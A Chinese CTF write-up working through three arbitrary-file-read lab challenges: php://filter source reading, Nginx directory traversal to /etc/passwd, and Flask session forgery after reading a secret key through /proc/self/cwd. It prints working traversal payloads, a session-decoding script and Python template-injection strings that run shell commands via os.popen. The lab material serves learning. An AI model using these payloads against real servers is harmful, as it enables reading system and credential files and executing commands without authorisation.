任意文件读取
概念:攻击者通过一些手段读取服务器上开发者不允许读到的文件,包括服务器的配置文件、文件形式存储的密钥、服务器信息、历史命令等等。
任意文件读取是属于文件操作漏洞的一种,一般任意文件读取漏洞可以读取配置信息甚至系统重要文件。严重的话,就可能导致SSRF,进而漫游至内网。
存读取文件的函数
读取文件的路径用户可控,且未校验或校验不严
输出了文件内容
readfile()、file_get_contents()、fopen()中,$filename没有经过校验或者校验不合格,用户可控制变量读取任意文件,如/etc/passwd、./index.php、/config.ini
《从0到1 CTFer成长之路》
afr1——filter为协议
打开网址看到下面的输出,注意到参数p,一看就是任意文件读取漏洞
试试flag(不带后缀,因为“hello”就没有后缀),输出nonono
下面使用“绝招”读源码:
?p=php://filter/read=convert.base64-encode/resource=flag
base64解码得到flag : n1book{afr_1_solved}
afr2——目录穿越
打开之后是一个gif图像,查看源码看一下
看到gif的目录是img/img.gif试着访问一下
可以看到图片
继续缩短目录,发现img目录是可以访问的
尝试改成/img../, 发现穿越到了上级目录:
Nginx目录穿越漏洞:Nginx反向代理,静态文件存储在/home/下,而访问时需要在url中输入files,配置文件中/files没有用/闭合,导致可以穿越至上层目录。这个/就导致我们可以从/home/目录穿越到他的上层目录
使用filename参数加载图像文件,图片文件位置可能映射在 /var/www/images/ 上,所以真实的路径是 /var/www/images/214.png ,这样构造url即可实现穿越?filename=../../../etc/passwd
直接打开flag目录,获得flag: n1book{afr_2_solved}
afr3——flask的session伪造
三个页面,连贯的操作
最后一个页面的URL如下:
看到name=artical,试试换成别的比如“aa”,显示没有这个文件,整个目录都暴露了
下面试试name=flag.php(name=flag也是no permission),有这个文件,但是没有访问权限。
看看了别人的WP,发现需要用flask的session伪造获取flag
(https://github.com/mo-xiaoxi/CTF_Web_docker/tree/master/HCTF2018/Hideandseek,这道题也用到了这个方法,有机会复现一下。WP:https://www.jianshu.com/p/d20168da7284 )
修改session,伪造admin用户,伪造session一定要密钥!!!
Flask加密脚本:https://github.com/noraj/flask-session-cookie-manager
首先看看现在的session形式(F12):
解密看一下session的格式,解密脚本:
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__':
print(decryption("eyJuMWNvZGUiOm51bGx9.YFr4cQ.gICS3BUHd4fvIyDIX_HveI4LESg".encode()))
输出{'n1code': None},猜测把None改成admin试试,不对,正确的session应该是:
# 执行任意命令
{'n1code': "{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat flag.py').read()}}"}
下面是几个常用的注入模板(python沙箱逃逸?):
1. ().__class__.__bases__[0].__subclasses__()[40](r'/etc/passwd').read()
2. ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /").read()' )
3. ''.__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()' )
下一步是重新加密,密钥key在key.py, 怎么知道有key.py这个文件的呢.
第二个知识点:Linux系统中的\proc\目录
关于/proc/目录 Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。
- /proc/[pid],当查看当前进程的时候可以用/proc/self代替,self是当前运行进程ID的符号链接
- cmdline — 启动当前进程的完整命令,但僵尸进程目录中的此文件不包含任何信息
- cwd — 指向当前进程运行目录的一个符号链接
- environ — 当前进程的环境变量列表,彼此间用空字符(NULL)隔开;变量用大写字母表示,其值用小写字母表示
payload:article?name=../../../proc/self/cmdline
回显python server.py。
读取这个文件:因为不知道当前的路径,无法通过路径读取,所以通过当前进程的工作目录来读取。
payload:article?name=../../../proc/self/cwd/server.py
看到有两个文件flag.py和key.py。查看key.py的内容
payload:article?name=../../../proc/self/cwd/key.py
得到key:Drmhze6EPcv0fN_81Bj-nA
利用session加密脚本,以key为密钥,加密新构造的session,得到新的伪造出的session
session:.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YFsCVw.rubo5Ztr2NoXcmWOAJRZ-STUXrY
通过burpsuit修改session,得到flag:n1book{afr_3_solved}
(需要注意的是,抓的包应该是第一个页面,不是一直操作的第三个页面)
参考资料
https://blog.csdn.net/qq_43625917/article/details/102617154
https://blog.csdn.net/Youth____/article/details/111171019
https://blog.csdn.net/wuyaowangchuan/article/details/109784072
